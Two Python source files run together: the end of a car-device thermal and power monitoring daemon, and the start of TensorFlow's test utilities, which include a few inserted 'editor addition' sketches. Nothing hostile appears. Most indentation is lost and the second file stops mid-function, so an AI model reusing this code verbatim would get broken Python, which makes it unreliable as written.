dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
usb_power = True
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
is_uno = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
usb_power = peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client
# Setup fan handler on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
if TICI:
fan_controller = TiciFanController()
elif is_uno or PC:
fan_controller = UnoFanController()
else:
fan_controller = EonFanController()
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.batteryPercent = HARDWARE.get_battery_capacity()
msg.deviceState.batteryCurrent = HARDWARE.get_battery_current()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = (now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
if TICI:
missing = (not Path("/data/media").is_mount()) and (not os.path.isfile("/persist/comma/living-in-the-moment"))
set_offroad_alert_if_changed("Offroad_StorageMissing", missing)
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
msg.deviceState.powerDrawW = current_power_draw if current_power_draw is not None else 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
if EON and not is_uno:
set_offroad_alert_if_changed("Offroad_ChargeDisabled", (not usb_power))
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
if EON and started_ts is None and msg.deviceState.memoryUsagePercent > 40:
cloudlog.event("High offroad memory usage", mem=msg.deviceState.memoryUsagePercent)
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import _pywrap_stacktrace_handler
from tensorflow.python import _pywrap_util_port
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import config
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable MLIR compilation.
def is_mlir_bridge_enabled():
return False
try:
from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable TFRT.
def is_tfrt_enabled():
return False
try:
from tensorflow.python.framework.is_tfrt_test_true import is_tfrt_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
def _get_object_count_by_type():
return collections.Counter([type(obj).__name__ for obj in gc.get_objects()])
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
      tester.assertEqual(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 3-, 4-, or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {3: [0, 2, 1], 4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
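# Illustrative sketch (editor addition): the shape-array form of the converters above.
# An NHWC shape [2, 4, 4, 8] becomes NCHW [2, 8, 4, 4], and the NCHW_VECT_C form packs
# the channel dimension into groups of 4, giving [2, 2, 4, 4, 4].
def _example_layout_conversions():
  nchw = NHWCToNCHW([2, 4, 4, 8])           # -> [2, 8, 4, 4]
  vect_c = NHWCToNCHW_VECT_C([2, 4, 4, 8])  # -> [2, 2, 4, 4, 4]
  return nchw, vect_c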
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
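# Illustrative sketch (editor addition): skip_if accepts either a boolean or a callable;
# with a callable the decision is deferred until the wrapped function actually runs, and
# a skipped call simply returns None.
def _example_skip_if_usage():
  @skip_if(lambda: not is_xla_enabled())
  def xla_only_check():
    return "ran under XLA"
  return xla_only_check()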
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
"""Context manager to skip cases not considered failures by the tests.
Note that this does not work if used in setUpClass/tearDownClass.
Usage in setUp/tearDown works fine just like regular test methods.
Args:
test_obj: A test object provided as `self` in the test methods; this object
is usually an instance of `unittest.TestCase`'s subclass and should have
`skipTest` method.
error_type: The error type to skip. Note that if `messages` are given, both
`error_type` and `messages` need to match for the test to be skipped.
messages: Optional, a string or list of strings. If `None`, the test will be
skipped if `error_type` matches what is raised; otherwise, the test is
skipped if any of the `messages` is contained in the message of the error
raised, and `error_type` matches the error raised.
Yields:
Nothing.
"""
if messages:
messages = nest.flatten(messages)
try:
yield
except error_type as e:
if not messages or any(message in str(e) for message in messages):
test_obj.skipTest("Skipping error: {}: {}".format(type(e), str(e)))
else:
raise
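# Illustrative sketch (editor addition): typical use of skip_if_error. `test_obj` is
# assumed to be a tf.test.TestCase instance (anything with a skipTest method); the raise
# below simulates a flaky environment error that should skip rather than fail the test.
def _example_skip_if_error_usage(test_obj):
  with skip_if_error(test_obj, errors.UnavailableError, ["connection reset", "peer down"]):
    raise errors.UnavailableError(None, None, "connection reset by peer")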
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
Args:
func: The function to test.
    warmup_iters: The number of warmup iterations, excluded from measuring.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
# Some objects are newly created by _get_object_count_by_type(). So
# create and save as a dummy variable to include it as a baseline.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
obj_count_by_type = _get_object_count_by_type()
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
